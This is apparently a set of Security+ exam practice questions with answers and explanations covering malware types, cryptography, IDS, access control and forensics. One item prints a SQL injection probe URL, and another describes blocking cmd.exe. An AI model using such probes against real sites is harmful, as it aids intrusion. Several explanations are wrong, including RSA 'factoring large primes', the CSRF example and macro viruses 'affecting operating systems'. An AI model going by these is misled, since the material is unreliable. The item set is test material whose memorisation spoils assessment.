armored virus An armored virus includes protective code that prevents examination of critical elements, such as scans by anti-virus software. The armor attempts to make it difficult to destroy the virus. An armored virus is difficult to reverse engineer. Answer C is incorrect. A companion virus attaches to legitimate programs and creates a program with a different file extension. When the user attempts to access the legitimate program, the companion virus executes in place of the legitimate program. Answer D is incorrect. A phage virus modifies other programs and databases. The only way to remove the virus is to reinstall the infected applications. Answer A is incorrect. A stealth virus prevents detection by hiding from applications. It may report a different file size than the actual file size as a method of preventing detection.

You have been asked to research the encryption algorithms available and make recommendations to management about which to implement. One of the encryption algorithms that you are researching is RSA. Which type of encryption algorithm does this algorithm represent?

asymmetric with authentication RSA is an example of asymmetric cryptography with authentication. RSA is used as the worldwide de facto standard for digital signatures. RSA is a public key algorithm that provides both encryption and authentication. It relies on the hacker's inability to factor large prime numbers. Asymmetric algorithms include Diffie-Hellman, RSA, ElGamal, Elliptic Curve Cryptosystem (ECC), CAST, and Knapsack. Symmetric algorithms include Data Encryption Standard (DES), Triple DES (3DES), Advanced Encryption Standard (AES), International Data Encryption Algorithm (IDEA), Blowfish, RC4, RC5, and RC6. Symmetric algorithms are sometimes called block ciphers. RSA does not deal with discrete logarithms. The security that RSA provides is based on the use of large prime numbers for encryption and decryption. It is difficult to factor large prime numbers. Therefore, it is difficult to break the encryption. RSA can prevent man-in-the-middle attacks by providing authentication before the exchange of public and private keys. The key is securely passed to the receiving machine. Therefore, public key cryptography is preferably used to secure fax messages. RSA requires higher processing power due to the factorability of its numbers, but provides efficient key management.

You have just installed a new FTP server, but you do not know what information the FTP server is transmitting when a user initially connects to it. Which tool could you use to discover that information, and consequently know what information an attacker could exploit?

banner grabbing A network administrator could use banner grabbing to identify the information an attacker would use, and then take steps to prevent that exploit. Banner grabbing intercepts a text file sent by a server or a host. The text file includes OS information and, in the case of a web server, perhaps the basic configuration info. The attacker can then exploit that information. Answers B, A, and D are incorrect. Backup utilities are critical components of network security. Whatever utility you deploy should allow for secure automation. Passive scanners do not directly interact with the network. An example would be scanning a company's website. Active scanners use tools like Nessus and Microsoft Baseline Security Analyzer that analyze the network itself. When comparing passive scans to active, passive scans are indirect, typically looking at sites that provide information, and active scans look at the actual network equipment. An active scan is also considered an intrusive scan, and usually provides more meaningful results.

You have just been hired as the systems administrator for a research and development firm. Your organization allows the employees to use social media at work. What particular concern should you voice to management?

data exfiltration You should voice your concern over data exfiltration. It would be very easy for a picture of something confidential to be posted to a social media site or for someone to discuss a new intellectual property project in a public forum. None of the other concerns would be affected by employee use of social media. Answers D, C, and B are incorrect. Content filters on firewalls and routers must be configured properly. Proper configuration is often an iterative process, blocking undesirable traffic while allowing appropriate traffic. Access points must also be configured properly. Wireless networks have their own security issues, but none that are affected by social media. Weak security configurations can arise from neglecting to implement a specific security device, or not configuring security settings properly.

You are creating an IDS solution for your company's network. You define a rule that prevents an e-mail client from executing the cmd.exe command and alerts you when this is attempted. Which type of IDS are you using?

behavior-based A behavior-based IDS looks for behavior that is not allowed and acts accordingly. When you define a rule that prevents an e-mail client from executing the cmd.exe command and alerts you when this is attempted, you are using behavior-based monitoring. Answers C and A are incorrect. A misuse-detection-based IDS is the same as signature-based monitoring. A signature-based IDS requires that updates be regularly obtained to ensure effectiveness. Signature-based monitoring watches for intrusions that match a known identity or signature when checked against a database that contains the identities of possible attacks. This database is known as the signature database. Answer D is incorrect. An anomaly-based IDS detects any changes or deviations in network traffic. With this type of monitoring, there is an initial learning period before anomalies can be detected. Once the baselines are established, anomaly-based monitoring can detect anomalous behavior. Sometimes the baseline is established through a manual process. Another type of IDS that you need to understand is a heuristic IDS. This type of monitoring uses artificial intelligence (AI) to detect intrusions. Analytics are performed on the actions taken, and the IDS acts based on the logic in the AI. False positives and false negatives are possible in a heuristic IDS. However, the AI is capable of learning if administrators notify the system when false positives and false negatives occur.

You have been hired as a security consultant by a real estate agency. The company currently implements discretionary access control (DAC) on its network. Who is primarily responsible for determining access control using this access control model?

data owner The data owner is primarily responsible for determining access control using discretionary access control (DAC). None of the other options is correct. None of the other persons named has any primary responsibilities when using DAC. Using mandatory access control (MAC), the security label assigned to subjects and objects is primarily responsible for determining access control. This security label is defined for each subject and object based on strict rules. Using role-based access control (RBAC), the security administrator is primarily responsible for determining access control based on the roles defined and the written security policy.

You are responsible for managing your company's virtualization environment. Which feature should NOT be allowed on a virtualization host?

browsing the internet You should not allow Internet browsing on a virtualization host. This can present a possible security breach through the introduction of spyware or malware. Anything that affects a virtualization host also affects all virtual computers on the host. Virtual servers have the same information security requirements as physical servers. Answers D, C, and B are incorrect. You should implement IPsec, implement a firewall, and monitor the event logs of a virtualization host. IPsec helps by encrypting data as it transmits across the network. Firewalls prevent unauthorized access to a physical or virtual computer. Event logs help administrators detect security breaches that have occurred or that are being attempted.

How does an unsigned Java applet enforce security in JDK 1.1?

by using sandboxes Unsigned Java applets in Java Development Kit 1.1 use sandboxes to enforce security. A sandbox is a security scheme that prevents Java applets from accessing unauthorized areas on a user's computer. This mechanism protects the system from malicious software, such as hostile applets, by enforcing the execution of the application within the sandbox and preventing access to the system resources outside the sandbox. The concept of a Web script that runs in its own environment and cannot interfere with any other process is known as a sandbox. A hostile applet is an active content module used to exploit system resources. Hostile applets coded in Java can pose a security threat to computer systems if the executables are downloaded from unauthorized sources. Hostile applets may disrupt the computer system operation, either through resource consumption or through covert channels. Answer A is incorrect. Object code refers to a version of a computer program that is compiled before it is ready to run in a computer. The application software on a system is typically in the form of compiled object code and does not include the source code. Object code is not related to the security aspects of Java. It represents an application program after the compilation process. Answer D is incorrect. Macro programs use macro languages. Macro languages, such as Visual Basic, are typically used to automate the common tasks and activities of application users. Macro programs have their own set of security vulnerabilities, such as macro viruses, but are not related to Java security. Answer C is incorrect. Digital and trust certificates are used by Microsoft's ActiveX technology to enforce security. ActiveX refers to a set of controls that users can download in the form of a plug-in to enhance a feature of an application. The primary difference between Java applets and ActiveX controls is that the ActiveX controls are downloaded subject to acceptance by a user. The ActiveX trust certificate also states the source of the plug-in signatures of the ActiveX modules. Java applets are short programs that use the technique of a sandbox to limit the applet's access to specific resources stored in the system. The term sandbox is also used to describe a test environment that is completely isolated from the rest of the network. It allows you to test new patches or applications prior to deployment in live systems.

You are considering cloud services, and you are concerned about the interaction of your security policies and those of the hosting provider. What can alleviate your concern?

cloud access security brokers Cloud access security brokers would alleviate your concern because they enforce security policies, whether on-premises or cloud-based. They often sit between the cloud service users and providers, merging the security policies of the user and the provider. Answer D is incorrect. Virtual desktop infrastructure (VDI) creates a user desktop on a virtual machine that is hosted on a data center server. Desktops can be personalized while still having centralized management and security. Virtual desktop environment (VDE) maintains everything related to the user desktop, and deploys it to the host. Virtual desktop infrastructure can make your desktops either more secure or less so. Storing data on VDI servers in the data center is more secure than storing it locally on the user's machine. Also, administrators have greater control over desktop and app distribution in a VDI environment. Answer A is incorrect. VM escape protection can be accomplished by sandboxing. If the virtual application crashes, sandboxing allows you to contain the data and not allow the information to "escape" into another application. VM escape occurs when a vulnerability in the operating system running in the virtual machine is exploited. When this occurs, it allows an attacker to run malicious code and escape the boundaries of the VM. Answer B is incorrect. Stress testing puts a load on the system much higher than what is normally expected. For example, testing a website with 100x the normal amount of traffic would identify how the system will respond to the stress. Stress testing does not reveal security weaknesses in the interaction of your security policies with those of the hosting provider. Choosing between an on-premises solution, a hosted solution, and a cloud solution are all virtualization decisions. On-premises virtual machines (VMs) are stored at your physical location. The hosted model allows you to contract with a third party for virtual access, and the responsibilities of the third party are detailed in a service level agreement (SLA). Cloud systems, while closely related to hosted models, have requirements such as on-demand self-service, broad network access, resource pooling, rapid elasticity and measured service, as defined by NIST.

Which attack involves changing a text file in which a Web server stores persistent settings?

cookie poisoning A Web server stores persistent settings on a Web client in a text file called a cookie. In the case of cookie poisoning, a cookie is changed to modify persistent data or the user that is associated with the cookie. Answer A is incorrect. With cross-site scripting (XSS), a script on a Web site, such as a JavaScript, is configured to manipulate a computer other than the Web server. Answer D is incorrect. With active content inserting, a program, such as a Java applet, is inserted into a Web page. Answer C is incorrect. With site spoofing, a Web client is tricked into believing that one Web site is being accessed, when in fact another Web site is being accessed.

You need to ensure that a set of users can access information regarding departmental expenses. However, each user should only be able to view the expenses for the department in which they work. Senior managers should be able to view the expenses for all departments. Which database security feature provides this granular access control?

database view The database security feature that provides this granular access control is database views. Database views are used to limit user and group access to certain information based on the user privileges and the need to know. Views can be used to restrict information based on group membership, user rights, and security labels. Views implement least privilege and need-to-know and provide content-dependent access restrictions. Views do not provide referential integrity, which is provided by constraints or rules. Answer D is incorrect. A save point does not provide granular access control. Save points ensure data integrity and availability but are not a database security feature. Save points are used to ensure that a database can return to a point when the system crashes. This further ensures the availability of the data prior to the database failure. Save points can be initiated either at a scheduled time or by a user action during data processing. Database integrity can also be provided through the implementation of referential integrity, where all the foreign keys reference the existing primary keys to identify the resource records in a table. Referential integrity requires that for any foreign key attribute, the referenced relation must have a tuple with the same value for its primary key. Answer A is incorrect. Partitioning does not provide granular access control. Partitioning is another protection technique for ensuring database security. Partitioning involves splitting the database into many parts. Partitioning makes it difficult for an intruder to collect and combine confidential information and deduce relevant facts. Answer B is incorrect. Noise and perturbation do not provide granular access control. The noise and perturbation technique deploys the insertion of bogus data to mislead attackers and protect database confidentiality and integrity. The noise and perturbation technique involves inserting randomized bogus information along with valid records of the database. This technique alters the data but allows the users to access relevant information from the database. This technique creates enough confusion for the attacker to extract confidential information. Database views are an example of content-dependent access control in which the access control is based on the sensitivity of information and the user privileges granted. This leads to a higher overhead in terms of processing because the data is granularly controlled by the content and the privileges of users. Database views can limit user access to portions of data instead of to the entire database. For example, during database processing in an organization, a department manager might have access only to the data of employees belonging to that department.

You have just discovered that an application that your company purchased is intentionally embedded with software code that allows a developer to bypass the regular access and authentication mechanisms. Which software code is being described?

debugging hooks A debugging or maintenance hook is software code that is intentionally embedded in the software during its development process to allow the developer to bypass the regular access and authentication mechanisms. These hooks can pose a threat to the security of the software and can be exploited if a maintenance hook is not removed before the software goes into production and an intruder is able to find it. Answer C is incorrect. A logic bomb is a malicious program that remains dormant and is triggered following a specific action by the user or after a certain time interval. The primary difference between logic bombs, viruses, and worms is that a logic bomb is triggered only when specific conditions are met. Answer D is incorrect. A pseudo-flaw refers to code with an apparent vulnerability that is embedded intentionally in the software to trap intruders. Answer A is incorrect. A multipart virus can infect both executable files and boot sectors of hard disk drives. The virus first resides in memory and then infects the boot sector and the executable files of the computer.

Your LAN is isolated from the Internet by a perimeter network. You suspect that someone is trying to gather information about your LAN. The IT director asks you to gather as much information about the attacker as possible while preventing the attacker from knowing that the attempt has been detected. What is the best method to accomplish this?

deploy a honeypot in the perimeter network A honeypot can be used to lure attackers in and trap them while you analyze their methods. The honeypot is usually placed within the perimeter network, which is the DMZ. Proxy servers are usually not placed in the perimeter network; they act as go-betweens, or mediators, for users on the LAN and servers on the Internet. A NIPS (network intrusion prevention system) can be placed in or out of a perimeter network, but it does not lure in attackers; instead, a NIPS attempts to prevent attacks from happening.

Your client is developing a new website. The web administrator has indicated that she would like to use a low-cost certificate to offer Transport Layer Security (TLS) to the new domain. What type of certificate should you recommend?

domain validation Domain validation certificates are very common. They are low-cost and are often used by web admins to offer TLS to a domain. They are validated using only the domain name. Extended validation certificates, as the name suggests, provide additional validation for HTTPS web sites. The certificate provides the name of the legal entity responsible for the web site. These certificates provide a higher level of trust than domain validation and require the most effort by the CA to validate. They are validated using more information than just the domain. Extended validation certificates require much more effort to deploy than domain validation certificates. Email certificates are used to secure email. One such example is Secure Multipurpose Internet Mail Extensions (S/MIME), which provides a digital "signature" for that email. Wildcard certificates allow you to create a certificate for a domain and use that same certificate for multiple subdomains. For example, if you had mail.mysite.com, ftp.mysite.com, and www.mysite.com, you could issue a wildcard certificate for mysite.com and have it cover all the subdomains. Without the wildcard certificate, you would have to issue a certificate for each subdomain.

A hacker has used a design flaw in an application to obtain unauthorized access to the application. Which type of attack has occurred?

escalation of privileges An escalation of privileges attack occurs when an attacker has used a design flaw in an application to obtain unauthorized access to the application. There are two types of privilege escalation: vertical and horizontal. With vertical privilege escalation, the attacker obtains higher privileges by performing operations that allow the attacker to run unauthorized code. With horizontal privilege escalation, the attacker obtains the same level of permissions as he already has but uses a different user account to do so. Answers B and D are incorrect. A backdoor is a term for lines of code that are inserted into an application to allow developers to enter the application and bypass the security mechanisms. Backdoors are also referred to as maintenance hooks. Answer A is incorrect. A buffer overflow occurs when an application erroneously allows an invalid amount of input into the buffer.

E-commerce payment systems, like PayPal and Google Checkout, allow the user to use a single identity across multiple platforms. Of which identity and access service is that an example?

federation Federation, or federated identity, is the ability of a user to use a single identity across multiple businesses or networks. Federation differs from single sign-on, where a user has one password that grants access to all the permitted network resources. Federation relies on trust relationships that are established between the different businesses or networks. Another example of federated identity is allowing Microsoft users to sign in to cloud services using their on-premises Active Directory domain credentials. A transitive trust involves creating relationships between domains to grant authenticated users access to other domains. In Active Directory, for example, if the Sales domain trusts the Marketing domain, and the Marketing domain trusts the HR domain, then Sales trusts the HR domain through a transitive relationship. Transitive trusts are established within a single organization or between private organizations. PayPal and Google Checkout do not use transitive trusts. Biometrics and keyboard cadence are both factors used in multi-factor authentication. Biometrics is something you are. Fingerprints, voiceprints, retina scans, and iris scans are all examples of biometrics. Keyboard cadence is an example of something you do. When the user enters a new password, the keystroke timing (cadence) is recorded as a signature pattern. Authentication factors may be part of the process of authenticating your identity, but they have nothing to do with authorizing the identity to access multiple businesses or networks. For the Security+ exam, you must understand the following authentication factors: something you are, something you have, something you know, somewhere you are, and something you do. Something you have is based on the user possessing some type of security device. These can include things such as smart cards, tokens, and key fobs.
Something you know would be a password, a PIN, the name of a childhood sweetheart, the color of your first car, or the answer to a similar question.

You are a security tester for a penetration testing security company. You are currently testing a website and you perform the following manual query: http://www.davidlprowse.com/cookies.jsp?products=5%20and%201=1 The following response is received in the payload: "ORA-000001: SQL command not properly ended" Based on the query and the response, what technique are you employing?

fingerprinting The technique being used here is fingerprinting, which is used to find out information about a system. It can be done passively by sniffing packets between hosts, or actively by sending special packets to a target and analyzing the responses. It can be done by scanning ports, or by using commands in a browser's URL bar, as is the case in this scenario. By adding syntax to the end of a domain, you can "test" the web server and ascertain information about it based on the results. In this case, the result is "ORA-000001: SQL command not properly ended". This tells us that the website is running an Oracle database (a relational SQL-oriented database). From there an attacker could limit attack techniques to that particular type of server, saving time. Now, if you were to run that actual syntax against my website, you would not see anything about Oracle, but you might get a 404 Not Found error. Underneath, it would tell you that the server is running Apache web server software, OpenSSL, and more. Unless, that is, we improved upon our input validation and secure coding concepts, which is exactly why these tests are performed—to uncover these vulnerabilities. Cross-site scripting (XSS) exploits the trust a user's browser has in a website through code injection, often in web forms, but not in the URL bar. SQL injection is a type of code injection in which user input in database web forms is not filtered correctly and is executed improperly. Privilege escalation is the act of exploiting a bug or design flaw in a software or firmware application to gain access to resources that normally would have been protected from an application or user. Remote code execution (RCE) is when an attacker obtains control of a target computer through some sort of vulnerability. Finally, a zero-day attack is one that is executed against a vulnerability in software before that vulnerability is known to the creator.
Unfortunately, as a security administrator, you are expected to be able to predict the future to a certain extent, and protect against the unknown. Don't worry though, the more experienced you get, the easier this becomes!

You are about to begin a forensic investigation. Which of the following is NOT part of the investigation?

follow the incident response plan Following an incident response plan is NOT part of an investigation. An incident response plan describes how to respond to various types of security incidents, but it is not part of the forensic investigation. All of the other options are part of an investigation. You should capture a system image to take a "snapshot" of the system at the time you begin the investigation. This will preserve the state of the system at that time. The system image can be examined later. Network traffic and logs should be analyzed. Variations in baselines can indicate repeated attacks, and password hack attempts would show up in the logs. You should also capture video of the scene. Video records a series of individual frames, which can be tagged to help identify points of interest. The video should also indicate the location, date, time, and the person who recorded the video. This step is referred to as active logging. An investigation also involves recording the time offset, taking hashes and screenshots, and completing witness interviews. You should record the time offset of the videos and all devices. It is not uncommon for a time to be off by a few seconds or even minutes. It is critical that you are able to trace events across multiple workstations and devices. You can add an entry into the log of a machine with the incorrect time to show the difference between the recorded time and the actual time. The time offset for every device and video that is captured must be recorded so that all evidence can be synchronized. You should take hashes of any digital evidence collected. This hash can then be compared to a hash that is calculated at a later date to ensure that the digital evidence has not been modified in any way. If the hash values are the same, the integrity of the digital evidence is verified. Screenshots allow you to record the information displayed on a computer screen or a smartphone.
If the computer is powered down, whatever is on the screen would be lost without a screenshot. Witness interviews are an element of forensic investigation. It is important to talk to witnesses as early as possible after an incident. As time passes, recollections may change, and details may be forgotten. If at all possible, you should use some type of electronic recording system to document the interview. This is referred to as intelligence gathering. In summary, the rules for forensic investigation are: Follow order of volatility rules. Capture a system image. Get copies of both a network traffic capture and logs. Ensure that the correct record time offset is obtained so that any recordings can be calibrated together. Take hashes of all files and images. Record the appropriate screenshots. Record any witnesses, including contact information. Keep track of man hours and expense involved in the forensic process. Obtain and preserve any video capture that exists, including computer video and CCTV. Perform big data analysis.

What type of documentation includes rules for ISO compliance, adhering to NIST guidelines, and conforming to PCI-DSS and other standards?

general purpose guides only

You are designing an access control system for a new company. The company has asked that you ensure that users are authenticated with a central server. In addition, users should only have access to the files they need to perform their jobs. When implementing access control, what is the appropriate order?

identification, authentication, authorization The appropriate order for access control is identification, authentication, and authorization. Identification is the process of identifying a user based on a user name, user identification (ID), or account number. Authentication is the process of validating the user with a second piece of information, usually a password, passphrase, or personal identification number (PIN). Authorization is the process of granting the user access to data based on the user identity and permissions. Authentication, authorization, and accounting (AAA) is a term for controlling access to computer resources using authentication, enforcing policies using authorization, and auditing usage and providing the information necessary to bill for services using accounting.

Which access control principle ensures that a particular role has more than one person trained to perform its duties?

job rotation Job rotation ensures that a particular role has more than one person trained to perform its duties. Personnel should be periodically rotated, particularly in important positions. Job rotation and separation of duties also help to prevent collusion. Answer C is incorrect. Separation of duties requires the involvement of more than one individual to accomplish a critical task. Separation of duties ensures that no individual can compromise a system, and is considered valuable in deterring fraud. Separation of duties can be either static or dynamic. Static separation of duties refers to the assignment of individuals to roles and to the allocation of transactions to roles. In static separation of duties, an individual can be either the initiator of a transaction or the authorizer of the transaction. In dynamic separation of duties, an individual can initiate as well as authorize transactions. Answer D is incorrect. The principle of least privilege grants users only those permissions they need to do their work. Limiting user access to administrative accounts is part of this principle. A need-to-know security policy is based on the principle of least privilege. The least privilege principle is most commonly associated with mandatory access control (MAC). Answer A is incorrect. An implicit deny ensures that certain users are not allowed to access a certain file, folder, or application. An implicit deny overrides all other permissions, including an explicit allow.

What is another term for technical controls?

logical controls Another term for technical controls is logical controls. Technical controls are used to restrict access to data and include operating system components, security applications, network devices, protocols, and encryption techniques. Answer D is incorrect. Access controls can be included as part of technical controls. However, access controls is not a term that is synonymous with technical controls. Answer C is incorrect. Detective controls are controls that are used to detect an intrusion when it occurs. While you can include detective technical controls in your security plan, detective controls can be technical, physical, or administrative. Detective technical controls include audit logs and intrusion detection systems (IDSs). Answer B is incorrect. Preventative controls are controls that are used to prevent an intrusion before it occurs. While you can include preventative technical controls in your security plan, preventative controls can be technical, physical, or administrative. Preventative technical controls include access control lists (ACLs), routers, encryption, antivirus software, smart cards, and call-back systems. Technical or logical controls include all authentication mechanisms, including password, two-factor, Kerberos, and RADIUS authentication. Network segmentation is accomplished by using logical controls. There are three categories of access control: technical, administrative, and physical controls. A technical control is a control that is put into place to restrict access. Technical controls work to protect system access, network architecture and access, control zones, auditing, and encryption and protocols. An administrative or management control is developed to dictate how security policies are implemented to fulfill the company's security goals. Administrative controls include policies and procedures, personnel controls, supervisory structure, security training, and testing.
A physical or operational control is a control that is implemented to secure physical access to an object, such as a building, a room, or a computer. Physical controls include network segregation, perimeter security, computer controls, work area separation, backups, and cabling. The three access control categories provide seven different functionalities or types: preventative - A preventative control prevents security breaches. detective - A detective control detects security breaches as they occur. corrective - A corrective control attempts to correct any damage that has been inflicted during a security breach and restores control. deterrent - A deterrent control deters potential violations. recovery - A recovery control restores resources. compensative - A compensative control provides an alternative control if another control may be too expensive. All controls are generally considered compensative. directive - A directive control provides mandatory controls based on regulations or environmental requirements. Each category of control includes controls that provide different functions. For example, a security badge is both a preventative physical control and a compensative physical control. Monitoring and supervising are both a detective administrative control and a compensative administrative control.

After troubleshooting an issue on a Windows computer, the IT technician determines that the computer has been infected by a platform-independent virus that was written in an application's language and is capable of infecting any files using that language. Which virus is present?

macro virus Macro viruses are programs written in Word Basic, Visual Basic, or VBScript. Macro viruses are platform-independent and pose a major threat because their underlying language is simple, so they are easy to develop. Macro viruses can infect any files that are written in the same language as the virus itself. They do not rely on the size of the packet. The ability of macro viruses to move from one operating system to another allows them to spread more effectively than other types of viruses. Macro viruses are typically associated with Microsoft Office products. Answer C is incorrect. A stealth virus hides the changes it makes to system files and boot records, making it difficult for antivirus software to detect its presence. A stealth virus keeps a copy of a file before infecting it and presents the original copy to the monitoring software. The stealth virus modifies the actual file and makes it difficult to detect the presence of the virus. Answer B is incorrect. A self-garbling virus can hide itself from antivirus software by manipulating its own code. When a self-garbling virus spreads, it jumbles and garbles its own code to prevent the antivirus software from detecting its presence. A small part of the virus code later decodes the jumbled part to obtain the rest of the virus code and infect the system. The ability of the self-garbling virus to reformat its own code makes it difficult for an antivirus to detect its presence. Answer A is incorrect. A polymorphic virus produces different operational copies of itself to evade detection by antivirus software. It creates multiple operational copies to ensure that in the event of antivirus detection, only a few copies are caught. A polymorphic virus is also capable of implementing encryption routines that require different decryption routines to avoid detection. A polymorphic virus belongs to a group of malware called polymorphic malware. This is harmful computer software such as a virus, worm, Trojan, or spyware.
These programs constantly change, making them difficult for anti-malware programs to detect. Macro viruses written in Visual Basic for Applications almost exclusively affect operating systems.

Management wants to install an Internet gateway, firewall, and Internet caching server on a new private network. You would prefer that a single device be installed to provide these services. Which network device should you install?

proxy server A proxy server acts as an Internet gateway, firewall, and Internet caching server for a private network. Hosts on the private network contact the proxy server with an Internet Web site request. The proxy server checks its cache to see if a locally stored copy of the site is available. If not, the proxy server communicates with its Internet connection to retrieve the Web site. The proxy server is virtually invisible to the client and the Internet connection. A proxy server can be configured to allow only outgoing Hypertext Transfer Protocol (HTTP) traffic by configuring which users have permissions to access the Internet via the proxy server. Answer A is incorrect. A virtual private network (VPN) is a private network that users can connect to over a public network. Often a VPN is implemented with a firewall to allow remote employees to connect to local resources. A VPN concentrator is the device that creates the VPN. Answer D is incorrect. An intrusion detection system (IDS) is a network device that detects network intrusion and either logs the intrusion or contacts the appropriate personnel. Answer C is incorrect. An intrusion prevention system (IPS) is a network device that detects network intrusion attempts and prevents the network intrusion. An IPS provides more security than an IDS because it actually provides prevention, not just detection. An Internet gateway can also be referred to as a Web security gateway. Its purpose is to defend against advanced Web attacks at the gateway. Firewalls, IDSs, IPSs, and proxies are often classified as application-aware devices because many of them can be configured to allow or deny traffic based on the application requesting access.

Your client's HR practices include promotion from within, and transferring people between offices on a regular basis. It seems like the most common question you hear when employees talk on the phone is "What office are you working at now and what are you doing?" What practice will ensure that a user's permissions are relevant and current?

recertification Recertification is the process of examining a user's permissions and determining if they still need access to what was previously granted. For example, if someone were transferred from the Chicago, IL, office to the Charlotte, NC, office, it would be reasonable to revoke the user's Chicago permissions. Likewise, a promotion would most likely require new privileges, and it is important to examine whether the privileges from the old position are still necessary. Answer C is incorrect. Federation, or federated identity, is the ability of a user to use a single identity across multiple businesses or networks. It differs from single sign-on, where a user has one password that grants access to all the permitted network resources. Federation would address enabling users' logon from office to office, but would not address the issue of current and relevant permissions related to users' job roles. Answer B is incorrect. Creating a standard naming convention would resolve an issue relating to account names that identify job roles or locations. However, it would not address the issue of current and relevant permissions. Answer A is incorrect. Transitive trust involves creating relationships between domains to grant authenticated users access to other domains. In Active Directory, for example, if the Sales domain trusts the Marketing domain, and the Marketing domain trusts the HR domain, then Sales trusts the HR domain through a transitive relationship.

You have decided to attach a digital timestamp to a document that is shared on the network. Which attack does this prevent?

replay attack Digital timestamps prove helpful in preventing replay attacks. In a replay attack, the attacker monitors the traffic stream in a network. The attacker maliciously repeats or delays the transmission of valid data over the network. Setting a threshold time value on each system ensures that the computer only accepts packets within a specified time frame. A packet received after the specified time indicates a possible replay attack. Digital timestamps are attached to a document at document creation. Answer A is incorrect. In a side channel attack, the attacker gains information about the encryption algorithms from the cryptosystem that is implemented in the network. The attacker can use information such as power consumption, electromagnetic radiation, and sound to break into a system. The side channel attack can also be based on the measurement of the time taken to perform a computation. Answer B is incorrect. A ciphertext-only attack is primarily focused on discovering the encryption key by gathering multiple encrypted messages and then trying to deduce a pattern from the encrypted messages. Answer C is incorrect. A known-plaintext attack primarily focuses on the discovery of the key used to encrypt the messages. The key can be used to decrypt and read messages. The attacker has access to multiple instances of plaintext and ciphertext for several messages.

Your company has recently decided to create a custom application instead of purchasing a commercial alternative. As the security administrator, you have been asked to develop security policies and procedures on examining the written code to discover any security holes that may exist. Which assessment type will be performed as a result of this new policy?

secure code review Secure code review examines all written code for any security holes that may exist. Secure code review should occur initially in software development. Secure coding concepts include exception handling, error handling, and input validation. During the system development life cycle (SDLC), secure coding concepts are included as part of application hardening. Answer A is incorrect. Baseline reporting ensures that security policies are being implemented properly. By providing baselines, gap analysis can determine if the current configuration has been changed in any way. Answer D is incorrect. Design review includes any steps you take to review the design of your network, devices, and applications. It often involves examining the ports and protocols used and the access control practices implemented. Answer C is incorrect. Vulnerability scanning looks for weaknesses in applications, devices, and networks. You can also determine the attack surface and review the architecture to help with the assessment. While both of these will allow you to identify areas where attacks may occur, they each assess different aspects. Determining the attack surface will help you identify the different components that can be attacked, and reviewing the architecture will help you identify network architecture security issues. For the Security+ exam, you must understand that all environments that you work in must be secured. All security patches and controls should be deployed in all physical and virtual environments, including the development, test, staging, and production environments. If you use smart card authentication in your production environment, you should also deploy it in the development, test, and staging environments so that all development, testing, and staging occurs in an environment that is identical to the production environment.

What concept is being illustrated when user accounts are created by one employee and user permissions are configured by another employee?

separation of duties

What is another name for a cross-site request forgery (XSRF)?

session riding Another name for cross-site request forgery (XSRF) is session riding. This application issue involves unauthorized commands coming from a trusted user to a user or Web site. It usually involves social networking. A good example is when two friends are chatting in an instant message application. During the session, user1 sends user2 a link to a video, but when user2 clicks the video, confidential information, such as bank account information, is sent to user1. Sometimes this attack is referred to as a one-click attack. Answer C is incorrect. Baselining is the process of comparing performance to a recorded metric. A buffer overflow is a type of denial of service (DoS) attack and occurs when more data is put into the buffer than it can handle. Answer B is incorrect. A macro virus is programming instructions in a programming language that commands an application to perform illegal actions. Answer A is incorrect. Another issue to understand is arbitrary code execution or remote code execution. Personnel should be cautioned against running code from an entity they do not know or trust. Often attackers will make the remote code look official to trick users into running it.

You have been asked to implement a biometric method that analyzes both the physical motions that are performed when a signature is signed and the specific features of a person's signature. Which biometric system should you implement?

signature dynamics Signature dynamics is the biometric method that analyzes both the physical motions performed when a signature is signed and the specific features of a person's signature. It usually captures the speed of the signing, the pressure of the pen when signing, and the way the pen is held. Hand geometry is a biometric method that analyzes the length and width of the hand. A digital signature is a method whereby the identity of the person sending the data is verified. It ensures that the original data has not been modified. Keystroke dynamics records a user's speed and motion when entering a phrase and compares it to stored data. Dynamic signature verification (DSV) is another term for signature dynamics.

You have installed an intrusion detection system (IDS) that watches for intrusions that match a known identity. Which type of IDS did you install?

signature-based IDS A signature-based IDS watches for intrusions that match a known identity or signature. All attack signatures are contained in a signature database. The signature database must be updated for a signature-based IDS to remain effective. Answer D is incorrect. A network-based IDS is attached to the network in a place where it can monitor all network traffic. It implements passive and active responses. Passive responses include logging, notification, and shunning. Active responses include terminating processes or sessions, network configuration changes, and deception. Answer A is incorrect. An anomaly-based IDS detects activities that are unusual. With this type of IDS, there is an initial learning period before anomalies can be detected. Once the baselines are established, an anomaly-based IDS can detect anomalous activities. Sometimes the baseline is established through a manual process. Answer B is incorrect. A behavior-based IDS detects behavior that is not allowed and acts accordingly. An IDS allows a security administrator to identify malicious activity after it has occurred. An intrusion prevention system (IPS) allows a security administrator to prevent malicious activity when it is attempted.

Which of the following would take the least amount of time to restore?

snapshots A snapshot is an image of the system at a given point in time. If a system crashed, restoring the snapshot would be the fastest way to restore the system. Answer C is incorrect. Differential backups begin with a full backup. On each day thereafter, you would back up all of the changes that had occurred since the last full backup. The order of restoration would be to restore the last full backup first, and then to restore the most recent differential backup. Answer D is incorrect. Incremental backups begin with a full backup. On each day thereafter, you would back up that day's changes. The order of restoration would be to restore the last full backup first, and then to restore each day's incremental backup in order from oldest to newest. Answer A is incorrect. Performing a full restoration using a full backup takes longer than restoring from a snapshot. The order of restoration if you did not have the appropriate backups would be to reinstall the OS, reinstall the applications, and then reinstall the user data.

A user accidentally installed a driver that had issues. You have been asked to return the computer to its state prior to the driver installation. Which of these is most likely the quickest method of meeting this requirement?

snapshots Most likely, the quickest way to do this is to use snapshots. Snapshots are system images that reflect the state of the system at a certain point in time. It is advantageous to take a snapshot of the system prior to making major system changes, "just in case" something goes wrong during the change. Restoring using a snapshot would also allow you to recover whatever user data and settings existed at the time of the snapshot. Live boot media involves creating bootable flash drives or DVDs. In the event of a major system failure, you can use the live boot media to boot and troubleshoot the system. However, no user data would be restored. Answers D, C, and B are incorrect. A master image would restore the system to the original configuration state, but all the user data and user settings would be lost. A master image allows you to create a standardized system configuration, such as an ISO file. This will ensure that all systems configured with the master image have the same configuration. The master image can be stored on a server and used in the event of disaster recovery, malware infections, new systems, and so on. Other resiliency techniques include non-persistence, rollback, and reverting to a known state. Non-persistence deals with system images that are temporary, typically stored in RAM, and can be replaced by deploying a permanent image. Revert to known state and rollback to known configuration are synonymous. In the event of a system crash, accessing these options during the boot process will allow you to instantly restore the system to an earlier state when everything worked.

Which encryption techniques are used by AES, DES, and Blowfish?

